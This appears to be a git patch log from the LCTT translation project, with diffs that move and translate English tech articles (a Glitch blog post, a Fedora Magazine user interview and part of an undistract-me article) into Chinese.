[![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png)][8] + +Please remember Undistract-me script notifies you only if the given command took more than 10 seconds to complete. If the command is completed in less than 10 seconds, you will not be notified. Of course, you can change this time interval settings as I described in the Configuration section above. + +I find this tool very useful. It helped me to get back to the business after I completely lost in some other tasks. I hope this tool will be helpful to you too. + +More good stuffs to come. Stay tuned! + +Cheers! + +Resource: + +* [Undistract-me GitHub Repository][1] + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/undistract-get-notification-long-running-terminal-commands-complete/ + +作者:[sk][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://github.com/jml/undistract-me +[2]:https://www.ostechnix.com/author/sk/ +[3]:https://www.ostechnix.com/get-notification-terminal-task-done/ +[4]:https://www.ostechnix.com/install-pacaur-arch-linux/ +[5]:https://www.ostechnix.com/install-packer-arch-linux-2/ +[6]:https://www.ostechnix.com/install-yaourt-arch-linux/ +[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png +[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png diff --git a/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md b/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md similarity index 100% rename from sources/tech/20171201 Fedora Classroom Session: Ansible 101.md rename to sources/tech/20171201 Fedora Classroom Session_Ansible 101.md From 9e42cbb031b688a1e732dbbc8405b70b425bff97 Mon Sep 17 00:00:00 2001 From: root Date: Wed, 6 Dec 2017 10:42:43 +0800 Subject: [PATCH 0335/1627] translated --- ... write fun small web projects instantly.md | 76 ------------------- ... write fun small web projects instantly.md | 73 ++++++++++++++++++ 2 files changed, 73 insertions(+), 76 deletions(-) delete mode 100644 sources/tech/20171113 Glitch write fun small web projects instantly.md create mode 100644 translated/tech/20171113 Glitch write fun small web projects instantly.md diff --git a/sources/tech/20171113 Glitch write fun small web projects instantly.md b/sources/tech/20171113 Glitch write fun small web projects instantly.md deleted file mode 100644 index 734853ce51..0000000000 --- a/sources/tech/20171113 Glitch write fun small web projects instantly.md +++ /dev/null @@ -1,76 +0,0 @@ -translating---geekpi - -Glitch: write fun small web projects instantly -============================================================ - -I just wrote about Jupyter Notebooks which are a fun interactive way to write Python code. That reminded me I learned about Glitch recently, which I also love!! I built a small app to [turn of twitter retweets][2] with it. So! - -[Glitch][3] is an easy way to make Javascript webapps. (javascript backend, javascript frontend) - -The fun thing about glitch is: - -1. you start typing Javascript code into their web interface - -2. as soon as you type something, it automagically reloads the backend of your website with the new code. You don’t even have to save!! It autosaves. - -So it’s like Heroku, but even more magical!! Coding like this (you type, and the code runs on the public internet immediately) just feels really **fun** to me. - -It’s kind of like sshing into a server and editing PHP/HTML code on your server and having it instantly available, which I kind of also loved. Now we have “better deployment practices” than “just edit the code and it is instantly on the internet” but we are not talking about Serious Development Practices, we are talking about writing tiny programs for fun. - -### glitch has awesome example apps - -Glitch seems like fun nice way to learn programming! - -For example, there’s a space invaders game (code by [Mary Rose Cook][4]) at [https://space-invaders.glitch.me/][5]. The thing I love about this is that in just a few clicks I can - -1. click “remix this” - -2. start editing the code to make the boxes orange instead of black - -3. have my own space invaders game!! Mine is at [http://julias-space-invaders.glitch.me/][1]. (i just made very tiny edits to make it orange, nothing fancy) - -They have tons of example apps that you can start from – for instance [bots][6], [games][7], and more. - -### awesome actually useful app: tweetstorms - -The way I learned about Glitch was from this app which shows you tweetstorms from a given user: [https://tweetstorms.glitch.me/][8]. - -For example, you can see [@sarahmei][9]’s tweetstorms at [https://tweetstorms.glitch.me/sarahmei][10] (she tweets a lot of good tweetstorms!). - -### my glitch app: turn off retweets - -When I learned about Glitch I wanted to turn off retweets for everyone I follow on Twitter (I know you can do it in Tweetdeck!) and doing it manually was a pain – I had to do it one person at a time. So I wrote a tiny Glitch app to do it for me! - -I liked that I didn’t have to set up a local development environment, I could just start typing and go! - -Glitch only supports Javascript and I don’t really know Javascript that well (I think I’ve never written a Node program before), so the code isn’t awesome. But I had a really good time writing it – being able to type and just see my code running instantly was delightful. Here it is: [https://turn-off-retweets.glitch.me/][11]. - -### that’s all! - -Using Glitch feels really fun and democratic. Usually if I want to fork someone’s web project and make changes I wouldn’t do it – I’d have to fork it, figure out hosting, set up a local dev environment or Heroku or whatever, install the dependencies, etc. I think tasks like installing node.js dependencies used to be interesting, like “cool i am learning something new” and now I just find them tedious. - -So I love being able to just click “remix this!” and have my version on the internet instantly. - - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ - -作者:[Julia Evans ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/ -[1]:http://julias-space-invaders.glitch.me/ -[2]:https://turn-off-retweets.glitch.me/ -[3]:https://glitch.com/ -[4]:https://maryrosecook.com/ -[5]:https://space-invaders.glitch.me/ -[6]:https://glitch.com/handy-bots -[7]:https://glitch.com/games -[8]:https://tweetstorms.glitch.me/ -[9]:https://twitter.com/sarahmei -[10]:https://tweetstorms.glitch.me/sarahmei -[11]:https://turn-off-retweets.glitch.me/ diff --git a/translated/tech/20171113 Glitch write fun small web projects instantly.md b/translated/tech/20171113 Glitch write fun small web projects instantly.md new file mode 100644 index 0000000000..fde7d7f880 --- /dev/null +++ b/translated/tech/20171113 Glitch write fun small web projects instantly.md @@ -0,0 +1,73 @@ +Glitch:立即写出有趣的小型网站项目 +============================================================ + +我刚写了一篇关于 Jupyter Notebooks 是一个有趣的交互式写 Python 代码的方式。这让我想起我最近学习了 Glitch,这个我同样喜爱!我构建了一个小的程序来用于[关闭转发 twitter][2]。因此有了这篇文章! + +[Glitch][3] 是一个简单的构建 Javascript web 程序的方式(javascript 后端、javascript 前端) + +关于 glitch 有趣的事有: + +1. 你在他们的网站输入 Javascript 代码 + +2. 只要输入了任何代码,它会自动用你的新代码重载你的网站。你甚至不必保存!它会自动保存。 + +所以这就像 Heroku,但更神奇!像这样的编码(你输入代码,代码立即在公共网络上运行)对我而言感觉很**有趣**。 + +这有点像 ssh 登录服务器,编辑服务器上的 PHP/HTML 代码,并让它立即可用,这也是我所喜爱的。现在我们有了“更好的部署实践”,而不是“编辑代码,它立即出现在互联网上”,但我们并不是在谈论严肃的开发实践,而是在讨论编写微型程序的乐趣。 + +### Glitch 有很棒的示例应用程序 + +Glitch 似乎是学习编程的好方式! + +比如,这有一个太空侵略者游戏(由 [Mary Rose Cook][4] 编写):[https://space-invaders.glitch.me/][5]。我喜欢的是我只需要点击几下。 + +1. 点击 “remix this” + +2. 开始编辑代码使箱子变成橘色而不是黑色 + +3. 制作我自己太空侵略者游戏!我的在这:[http://julias-space-invaders.glitch.me/][1]。(我只做了很小的更改使其变成橘色,没什么神奇的) + +他们有大量的示例程序,你可以从中启动 - 例如[机器人][6]、[游戏][7]等等。 + +### 实际有用的非常好的程序:tweetstorms + +我学习 Glitch 的方式是从这个程序:[https://tweetstorms.glitch.me/][8],它会向你展示给定用户的 tweetstorm。 + +比如,你可以在 [https://tweetstorms.glitch.me/sarahmei][10] 看到 [@sarahmei][9] 的 tweetstorm(她发布了很多好的 tweetstorm!)。 + +### 我的 Glitch 程序: 关闭转推 + +当我了解到 Glitch 的时候,我想关闭在 Twitter 上关注的所有人的转推(我知道可以在 Tweetdeck 中做这件事),而且手动做这件事是一件很痛苦的事 - 我一次只能设置一个人。所以我写了一个 Glitch 程序来为我做! + +我喜欢我不必设置一个本地开发环境,我可以直接开始输入然后开始! + +Glitch 只支持 Javascript,我不非常了解 Javascript(我之前从没写过一个 Node 程序),所以代码不是很好。但是编写它很愉快 - 能够输入并立即看到我的代码运行是令人愉快的。这是我的项目:[https://turn-off-retweets.glitch.me/][11]。 + +### 就是这些! + +使用 Glitch 感觉真的很有趣和民主。通常情况下,如果我想 fork 某人的 Web 项目,并做出更改,我不会这样做 - 我必须 fork,找一个托管,设置本地开发环境或者 Heroku 或其他,安装依赖项等。我认为像安装 node.js 依赖关系这样的任务过去很有趣,就像“我正在学习新东西很酷”,现在我觉得它们很乏味。 + +所以我喜欢只需点击 “remix this!” 并立即在互联网上能有我的版本。 + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ + +作者:[Julia Evans ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/ +[1]:http://julias-space-invaders.glitch.me/ +[2]:https://turn-off-retweets.glitch.me/ +[3]:https://glitch.com/ +[4]:https://maryrosecook.com/ +[5]:https://space-invaders.glitch.me/ +[6]:https://glitch.com/handy-bots +[7]:https://glitch.com/games +[8]:https://tweetstorms.glitch.me/ +[9]:https://twitter.com/sarahmei +[10]:https://tweetstorms.glitch.me/sarahmei +[11]:https://turn-off-retweets.glitch.me/ From 8391d9321c5fba682cfffa41436516aae1e171f2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Wed, 6 Dec 2017 10:43:15 +0800 Subject: [PATCH 0336/1627] Update 20171120 Mark McIntyre How Do You Fedora.md --- ...0171120 Mark McIntyre How Do You Fedora.md | 38 +++++++++---------- 1 file changed, 18 insertions(+), 20 deletions(-) diff --git a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md index 40af7eba2f..76606f74dc 100644 --- a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md +++ b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md @@ -1,54 +1,52 @@ -translating by zrszrszrs -# [Mark McIntyre: How Do You Fedora?][1] # [Mark McIntyre: 你是如何使用Fedora的?][1] ![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) -We recently interviewed Mark McIntyre on how he uses Fedora. This is [part of a series][2] on the Fedora Magazine. The series profiles Fedora users and how they use Fedora to get things done. Contact us on the [feedback form][3] to express your interest in becoming a interviewee. +最近我们采访了 Mark McIntyre,谈来他是如何使用 Fedora 系统的。这也是Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 -### Who is Mark McIntyre? +### Mark McIntyre 是谁? -Mark McIntyre is a geek by birth and Linux by choice. “I started coding at the early age of 13 learning BASIC on my own and finding the excitement of programming which led me down a path of becoming a professional coder,” he says. McIntyre and his niece are big fans of pizza. “My niece and I started a quest last fall to try as many of the pizza joints in Knoxville. You can read about our progress at [https://knox-pizza-quest.blogspot.com/][4]” Mark is also an amateur photographer and [publishes his images][5] on Flickr. +Mark McIntyre 是一个天生的极客,后天的 Linux 爱好者。他说:“我在 13 岁开始编程,当时自学 BASIC 语言,我体会到其中的乐趣,并在乐趣的引导下,一步步成为专业的码农。”Mark 和他的侄女都是披萨饼的死忠粉。“去年秋天,我和我的侄女尽可能多地光顾了诺克斯维尔的披萨饼连锁店。 点击 [https://knox-pizza-quest.blogspot.com/][4] 可以了解我们的进展情况。”Mark 也是一名业余的摄影爱好者,并且在 Flickr 上 [发布自己的作品][5]。 ![](https://fedoramagazine.org/wp-content/uploads/2017/11/31456893222_553b3cac4d_k-1024x575.jpg) -Mark has a diverse background as a developer. He has worked with Visual Basic for Applications, LotusScript, Oracle’s PL/SQL, Tcl/Tk and Python with Django as the framework. His strongest skill is Python which he uses in his current job as a systems engineer. “I am using Python on a regular basis. As my job is morphing into more of an automation engineer, that became more frequent.” +作为一名开发者,Mark 有着丰富的工作背景。他用过 Visual Basic 编写应用程序,用过 LotusScript、 PL/SQL(Oracle)、 Tcl/TK 编写代码,也用过基于 Python 的 Django 框架。他的强项是 Python。这也是目前他作为系统工程师的工作语言。“我用 Python 比较规律。但当我的工作变得更像是自动化工程师时,Python 用得就更频繁了。” -McIntyre is a self-described nerd and loves sci-fi movies, but his favorite movie falls out of that genre. “As much as I am a nerd and love the Star Trek and Star Wars and related movies, the movie Glory is probably my favorite of all time.” He also mentioned that Serenity was a fantastic follow-up to a great TV series. +McIntyre 自称是个书呆子,喜欢科幻电影,但他最喜欢的一部电影却不是科幻片。“尽管我是个书呆子,喜欢看《星际迷航》、《星球大战》之类的影片,但《光荣战役》或许才是我最喜欢的电影。”他还提到,电影《冲出宁静号》实属著名电视剧《萤火虫》的精彩后续。 -Mark values humility, knowledge and graciousness in others. He appreciates people who act based on understanding the situation that other people are in. “If you add a decision to serve another, you have the basis for someone you’d want to be around instead of someone who you have to tolerate.” +Mark 比较看重他人的谦逊、知识与和气。他欣赏能够设身处地为他人着想的人。“如果你决定为另一个人服务,那么你会选择自己愿意亲近的人,而不是让自己备受折磨的人。” -McIntyre works for [Scripps Networks Interactive][6], which is the parent company for HGTV, Food Network, Travel Channel, DIY, GAC, and several other cable channels. “Currently, I function as a systems engineer for the non-linear video content, which is all the media purposed for online consumption.” He supports a few development teams who write applications to publish the linear video from cable TV into the online formats such as Amazon and Hulu. The systems include both on-premise and cloud systems. Mark also develops automation tools for deploying these applications primarily to a cloud infrastructure. +McIntyre 目前在 [Scripps Networks Interactive][6] 工作,这家公司是 HGTV、Food Network、Travel Channel、DIY、GAC 以及其他几个有线电视频道的母公司。“我现在是一名系统工程师,负责非线性视频内容,这是全部媒体开展线上消费的计划。”他支持一些开发团队编写应用程序,将线性视频从有线电视发布到线上平台,比如亚马逊、葫芦。这些系统既包含预置系统,也包含云系统。Mark 还开发了一些自动化工具,将这些应用程序主要部署到云基础结构中。 -### The Fedora community +### Fedora 社区 -Mark describes the Fedora community as an active community filled with people who enjoy life as Fedora users. “From designers to packagers, this group is still very active and feels alive.” McIntyre continues, “That gives me a sense of confidence in the operating system.” +Mark 形容 Fedora 社区是一个富有活力的社区,充满着像 Fedora 用户一样热爱生活的人。“从设计师到包装师,这个团体依然非常活跃,生机勃勃。” 他继续说道:“这使我对操作系统抱有一种信心。” -He started frequenting the #fedora channel on IRC around 2002: “Back then, Wi-Fi functionality was still done a lot by hand in starting the adapter and configuring the modules.” In order to get his Wi-Fi working he had to recompile the Fedora kernel. Shortly after, he started helping others in the #fedora channel. +2002年左右,Mark 开始经常使用 IRC 上的 #fedora 频道:“那时候,Wi-Fi 在启用适配器和配置模块功能时,有许多还是靠手工实现的。”为了让他的 Wi-Fi 能够工作,他不得不重新去编译 Fedora 内核。 -McIntyre encourages others to get involved in the Fedora Community. “There are many different areas of opportunity in which to be involved. Front-end design, testing deployments, development, packaging of applications, and new technology implementation.” He recommends picking an area of interest and asking questions of that group. “There are many opportunities available to jump in to contribute.” +McIntyre 鼓励他人参与 Fedora 社区。“这里有许多来自不同领域的机会。前端设计、测试部署、开发、应用程序包装以及新型技术实现。”他建议选择一个感兴趣的领域,然后向那个团体提出疑问。“这里有许多机会去奉献自己。” -He credits a fellow community member with helping him get started: “Ben Williams was very helpful in my first encounters with Fedora, helping me with some of my first installation rough patches in the #fedora support channel.” Ben also encouraged Mark to become an [Ambassador][7]. +对于帮助他起步的社区成员,Mark 赞道:“Ben Williams 非常乐于助人。在我第一次接触Fedora时,他帮我搞定了一些#fedora支持频道中的安装补丁。”Ben 也鼓励 Mark 去做 Fedora [代表][7]。 -### What hardware and software? +### 什么样的硬件和软件? -McIntyre uses Fedora Linux on all his laptops and desktops. On servers he chooses CentOS, due to the longer support lifecycle. His current desktop is self-built and equipped with an Intel Core i5 processor, 32 GB of RAM and 2 TB of disk space. “I have a 4K monitor attached which gives me plenty of room for viewing all my applications at once.” His current work laptop is a Dell Inspiron 2-in-1 13-inch laptop with 16 GB RAM and a 525 GB m.2 SSD. +McIntyre 将 Fedora Linux 系统用在他的笔记本和台式机上。在服务器上他选择了 CentOS,因为它有更长的生命周期支持。他现在的台式机是自己组装的,配有 Intel 酷睿 i5 处理器,32GB 的内存和2TB 的硬盘。“我装了个 4K 的显示屏,有足够大的地方来同时查看所有的应用。”他目前工作用的笔记本是戴尔灵越二合一,配备 13 英寸的屏,16 GB 的内存和 525 GB 的 m.2 固态硬盘。 ![](https://fedoramagazine.org/wp-content/uploads/2017/11/Screenshot-from-2017-10-26-08-51-41-1024x640.png) -Mark currently runs Fedora 26 on any box he setup in the past few months. When it comes to new versions he likes to avoid the rush when the version is officially released. “I usually try to get the latest version as soon as it goes gold, with the exception of one of my workstations running the next version’s beta when it is closer to release.” He usually upgrades in place: “The in-place upgrade using  _dnf system-upgrade_  works very well these days.” +Mark 现在将 Fedora 26 运行在他过去几个月装配的所有盒子中。当一个新版本正式发布的时候,他倾向于避开这个高峰期。“除非在它即将发行的时候,我的工作站中有个正在运行下一代测试版本,通常情况下,一旦它发展成熟,我都会试着去获取最新的版本。”他经常采取就地更新:“这种就地更新方法利用 dnf 系统升级插件,目前表现得非常好。” -To handle his photography, McIntyre uses [GIMP][8] and [Darktable][9], along with a few other photo viewing and quick editing packages. When not using web-based email, he uses [Geary][10] along with [GNOME Calendar][11]. Mark’s IRC client of choice is [HexChat][12] connecting to a [ZNC bouncer][13]running on a Fedora Server instance. His department’s communication is handled via Slack. +为了搞摄影,McIntyre 用上了 [GIMP][8]、[Darktable][9],以及其他一些照片查看包和快速编辑包。当不启用网络电子邮件时,Mark 会使用 [Geary][10],还有[GNOME Calendar][11]。Mark 选用 HexChat 作为 IRC 客户端,[HexChat][12] 与在 Fedora 服务器实例上运行的 [ZNC bouncer][13] 联机。他的部门通过 Slave 进行沟通交流。 -“I have never really been a big IDE fan, so I spend time in [vim][14] for most of my editing.” Occasionally, he opens up a simple text editor like [gedit][15] or [xed][16]. Mark uses [GPaste][17] for  copying and pasting. “I have become a big fan of [Tilix][18] for my terminal choice.” McIntyre manages the podcasts he likes with [Rhythmbox][19], and uses [Epiphany][20] for quick web lookups. +“我从来都不是 IDE 粉,所以大多数的编辑任务都是在 [vim][14] 上完成的。”Mark 偶尔也会打开一个简单的文本编辑器,如 [gedit][15],或者 [xed][16]。他用 [GPaste][17] 做复制和粘贴工作。“对于终端的选择,我已经变成 [Tilix][18] 的忠粉。” McIntyre 通过 [Rhythmbox][19] 来管理他喜欢的播客,并用 [Epiphany][20] 实现快速网络查询。 -------------------------------------------------------------------------------- via: https://fedoramagazine.org/mark-mcintyre-fedora/ 作者:[Charles Profitt][a] -译者:[译者ID](https://github.com/译者ID) +译者:[zrszrs](https://github.com/zrszrszrs) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 9906fd3a107cf8b38291b23164e012191f3b4cf3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Wed, 6 Dec 2017 11:05:45 +0800 Subject: [PATCH 0337/1627] Update 20171120 Mark McIntyre How Do You Fedora.md --- .../tech/20171120 Mark McIntyre How Do You Fedora.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md index 76606f74dc..e89527a377 100644 --- a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md +++ b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md @@ -3,7 +3,7 @@ ![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) -最近我们采访了 Mark McIntyre,谈来他是如何使用 Fedora 系统的。这也是Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 +最近我们采访了 Mark McIntyre,谈来他是如何使用 Fedora 系统的。这也是 Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 ### Mark McIntyre 是谁? @@ -11,7 +11,7 @@ Mark McIntyre 是一个天生的极客,后天的 Linux 爱好者。他说: ![](https://fedoramagazine.org/wp-content/uploads/2017/11/31456893222_553b3cac4d_k-1024x575.jpg) -作为一名开发者,Mark 有着丰富的工作背景。他用过 Visual Basic 编写应用程序,用过 LotusScript、 PL/SQL(Oracle)、 Tcl/TK 编写代码,也用过基于 Python 的 Django 框架。他的强项是 Python。这也是目前他作为系统工程师的工作语言。“我用 Python 比较规律。但当我的工作变得更像是自动化工程师时,Python 用得就更频繁了。” +作为一名开发者,Mark 有着丰富的工作背景。他用过 Visual Basic 编写应用程序,用过 LotusScript、 PL/SQL(Oracle)、 Tcl/TK 编写代码,也用过基于 Python 的 Django 框架。他的强项是 Python。这也是目前他作为系统工程师的工作语言。“我用 Python 比较规律。但当我的工作变得更像是自动化工程师时, Python 用得就更频繁了。” McIntyre 自称是个书呆子,喜欢科幻电影,但他最喜欢的一部电影却不是科幻片。“尽管我是个书呆子,喜欢看《星际迷航》、《星球大战》之类的影片,但《光荣战役》或许才是我最喜欢的电影。”他还提到,电影《冲出宁静号》实属著名电视剧《萤火虫》的精彩后续。 @@ -27,11 +27,11 @@ Mark 形容 Fedora 社区是一个富有活力的社区,充满着像 Fedora McIntyre 鼓励他人参与 Fedora 社区。“这里有许多来自不同领域的机会。前端设计、测试部署、开发、应用程序包装以及新型技术实现。”他建议选择一个感兴趣的领域,然后向那个团体提出疑问。“这里有许多机会去奉献自己。” -对于帮助他起步的社区成员,Mark 赞道:“Ben Williams 非常乐于助人。在我第一次接触Fedora时,他帮我搞定了一些#fedora支持频道中的安装补丁。”Ben 也鼓励 Mark 去做 Fedora [代表][7]。 +对于帮助他起步的社区成员,Mark 赞道:“Ben Williams 非常乐于助人。在我第一次接触 Fedora 时,他帮我搞定了一些 #fedora 支持频道中的安装补丁。” Ben 也鼓励 Mark 去做 Fedora [代表][7]。 ### 什么样的硬件和软件? -McIntyre 将 Fedora Linux 系统用在他的笔记本和台式机上。在服务器上他选择了 CentOS,因为它有更长的生命周期支持。他现在的台式机是自己组装的,配有 Intel 酷睿 i5 处理器,32GB 的内存和2TB 的硬盘。“我装了个 4K 的显示屏,有足够大的地方来同时查看所有的应用。”他目前工作用的笔记本是戴尔灵越二合一,配备 13 英寸的屏,16 GB 的内存和 525 GB 的 m.2 固态硬盘。 +McIntyre 将 Fedora Linux 系统用在他的笔记本和台式机上。在服务器上他选择了 CentOS,因为它有更长的生命周期支持。他现在的台式机是自己组装的,配有 Intel 酷睿 i5 处理器,32GB 的内存和2TB 的硬盘。“我装了个 4K 的显示屏,有足够大的,地方来同时查看所有的应用。”他目前工作用的笔记本是戴尔灵越二合一,配备 13 英寸的屏,16 GB 的内存和 525 GB 的 m.2 固态硬盘。 ![](https://fedoramagazine.org/wp-content/uploads/2017/11/Screenshot-from-2017-10-26-08-51-41-1024x640.png) @@ -39,7 +39,7 @@ Mark 现在将 Fedora 26 运行在他过去几个月装配的所有盒子中。 为了搞摄影,McIntyre 用上了 [GIMP][8]、[Darktable][9],以及其他一些照片查看包和快速编辑包。当不启用网络电子邮件时,Mark 会使用 [Geary][10],还有[GNOME Calendar][11]。Mark 选用 HexChat 作为 IRC 客户端,[HexChat][12] 与在 Fedora 服务器实例上运行的 [ZNC bouncer][13] 联机。他的部门通过 Slave 进行沟通交流。 -“我从来都不是 IDE 粉,所以大多数的编辑任务都是在 [vim][14] 上完成的。”Mark 偶尔也会打开一个简单的文本编辑器,如 [gedit][15],或者 [xed][16]。他用 [GPaste][17] 做复制和粘贴工作。“对于终端的选择,我已经变成 [Tilix][18] 的忠粉。” McIntyre 通过 [Rhythmbox][19] 来管理他喜欢的播客,并用 [Epiphany][20] 实现快速网络查询。 +“我从来都不是 IDE 粉,所以大多数的编辑任务都是在 [vim][14] 上完成的。”Mark 偶尔也会打开一个简单的文本编辑器,如 [gedit][15],或者 [xed][16]。他用 [GPaste][17] 做复制和粘贴工作。“对于终端的选择,我已经变成 [Tilix][18] 的忠粉。”McIntyre 通过 [Rhythmbox][19] 来管理他喜欢的播客,并用 [Epiphany][20] 实现快速网络查询。 -------------------------------------------------------------------------------- From cde0a112fc36619879e0772c81843e14ce8a3c4e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Wed, 6 Dec 2017 11:06:15 +0800 Subject: [PATCH 0338/1627] Update 20171120 Mark McIntyre How Do You Fedora.md --- sources/tech/20171120 Mark McIntyre How Do You Fedora.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md index e89527a377..4fe315eb07 100644 --- a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md +++ b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md @@ -3,7 +3,7 @@ ![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) -最近我们采访了 Mark McIntyre,谈来他是如何使用 Fedora 系统的。这也是 Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 +最近我们采访了 Mark McIntyre,谈了他是如何使用 Fedora 系统的。这也是 Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 ### Mark McIntyre 是谁? From 0422527c893f226ab6c0395f395104ab8a91e233 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Wed, 6 Dec 2017 11:24:30 +0800 Subject: [PATCH 0339/1627] 333 translated --- translated/tech/233 | 74 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 translated/tech/233 diff --git a/translated/tech/233 b/translated/tech/233 new file mode 100644 index 0000000000..4fe315eb07 --- /dev/null +++ b/translated/tech/233 @@ -0,0 +1,74 @@ +# [Mark McIntyre: 你是如何使用Fedora的?][1] + + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) + +最近我们采访了 Mark McIntyre,谈了他是如何使用 Fedora 系统的。这也是 Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 + +### Mark McIntyre 是谁? + +Mark McIntyre 是一个天生的极客,后天的 Linux 爱好者。他说:“我在 13 岁开始编程,当时自学 BASIC 语言,我体会到其中的乐趣,并在乐趣的引导下,一步步成为专业的码农。”Mark 和他的侄女都是披萨饼的死忠粉。“去年秋天,我和我的侄女尽可能多地光顾了诺克斯维尔的披萨饼连锁店。 点击 [https://knox-pizza-quest.blogspot.com/][4] 可以了解我们的进展情况。”Mark 也是一名业余的摄影爱好者,并且在 Flickr 上 [发布自己的作品][5]。 + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/31456893222_553b3cac4d_k-1024x575.jpg) + +作为一名开发者,Mark 有着丰富的工作背景。他用过 Visual Basic 编写应用程序,用过 LotusScript、 PL/SQL(Oracle)、 Tcl/TK 编写代码,也用过基于 Python 的 Django 框架。他的强项是 Python。这也是目前他作为系统工程师的工作语言。“我用 Python 比较规律。但当我的工作变得更像是自动化工程师时, Python 用得就更频繁了。” + +McIntyre 自称是个书呆子,喜欢科幻电影,但他最喜欢的一部电影却不是科幻片。“尽管我是个书呆子,喜欢看《星际迷航》、《星球大战》之类的影片,但《光荣战役》或许才是我最喜欢的电影。”他还提到,电影《冲出宁静号》实属著名电视剧《萤火虫》的精彩后续。 + +Mark 比较看重他人的谦逊、知识与和气。他欣赏能够设身处地为他人着想的人。“如果你决定为另一个人服务,那么你会选择自己愿意亲近的人,而不是让自己备受折磨的人。” + +McIntyre 目前在 [Scripps Networks Interactive][6] 工作,这家公司是 HGTV、Food Network、Travel Channel、DIY、GAC 以及其他几个有线电视频道的母公司。“我现在是一名系统工程师,负责非线性视频内容,这是全部媒体开展线上消费的计划。”他支持一些开发团队编写应用程序,将线性视频从有线电视发布到线上平台,比如亚马逊、葫芦。这些系统既包含预置系统,也包含云系统。Mark 还开发了一些自动化工具,将这些应用程序主要部署到云基础结构中。 + +### Fedora 社区 + +Mark 形容 Fedora 社区是一个富有活力的社区,充满着像 Fedora 用户一样热爱生活的人。“从设计师到包装师,这个团体依然非常活跃,生机勃勃。” 他继续说道:“这使我对操作系统抱有一种信心。” + +2002年左右,Mark 开始经常使用 IRC 上的 #fedora 频道:“那时候,Wi-Fi 在启用适配器和配置模块功能时,有许多还是靠手工实现的。”为了让他的 Wi-Fi 能够工作,他不得不重新去编译 Fedora 内核。 + +McIntyre 鼓励他人参与 Fedora 社区。“这里有许多来自不同领域的机会。前端设计、测试部署、开发、应用程序包装以及新型技术实现。”他建议选择一个感兴趣的领域,然后向那个团体提出疑问。“这里有许多机会去奉献自己。” + +对于帮助他起步的社区成员,Mark 赞道:“Ben Williams 非常乐于助人。在我第一次接触 Fedora 时,他帮我搞定了一些 #fedora 支持频道中的安装补丁。” Ben 也鼓励 Mark 去做 Fedora [代表][7]。 + +### 